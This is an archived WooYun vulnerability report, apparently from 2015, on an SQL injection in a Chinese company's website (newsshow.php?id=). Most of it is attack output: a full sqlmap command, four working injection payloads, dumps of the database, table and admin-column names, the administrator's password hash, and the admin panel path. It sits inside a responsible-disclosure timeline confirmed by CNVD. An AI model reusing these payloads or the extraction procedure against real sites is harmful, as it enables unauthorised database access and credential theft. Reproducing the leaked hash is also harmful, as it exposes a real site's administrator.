乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-30: 厂商已经确认,细节仅向厂商公开 2015-11-09: 细节向核心白帽子及相关领域专家公开 2015-11-19: 细节向普通白帽子公开 2015-11-29: 细节向实习白帽子公开 2015-12-14: 细节向公众公开
网合科技存在SQL注入漏洞,可获取管理员权限,继而登录后台管理。
1. SQL注入测试
sqlmap.py -u "http://**.**.**.**/cn/newsshow.php?id=7" --dbs --level 3 --risk 3 --current-user --users --is-dba --password --threads=10
2. 获得管理员权限
Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=7 AND 9640=9640 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=7 AND (SELECT 5897 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(5897=5897,1))),0x716a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=7 AND (SELECT * FROM (SELECT(SLEEP(10)))zdXJ) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-1753 UNION ALL SELECT CONCAT(0x7171787171,0x6d4843527143676b64776b4b536a586862426459706c74596471716d7145725a7663696b52796449,0x716a626271),NULL,NULL-- ----web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17back-end DBMS: MySQL 5.0banner: '5.1.65-community'available databases [2]:[*] information_schema[*] wonhe
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0Database: wonhe[9 tables]+-------------------+| chanpin-fl || news-fl || touzizheguanxi-fl || admin || chanpin || news || note || touzizheguanxi || zhaopin |+-------------------+
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0Database: wonheTable: admin[6 columns]+------------+-------------+| Column | Type |+------------+-------------+| id | int(11) || logincount | int(11) || logintime | varchar(20) || name | varchar(50) || note | text || password | varchar(50) |+------------+-------------+
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0Database: wonheTable: admin[1 entry]+----+------------+---------------------+-------+------+----------------------------------+| id | logincount | logintime | name | note | password |+----+------------+---------------------+-------+------+----------------------------------+| 1 | 162 | 2015-10-23 15:05:23 | admin | 管理员 | e11dfe10190f9a469ba02fc71c706468 |+----+------------+---------------------+-------+------+----------------------------------+
后台管理地址:http://**.**.**.**/admin/
略
危害等级:高
漏洞Rank:10
确认时间:2015-10-30 16:48
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无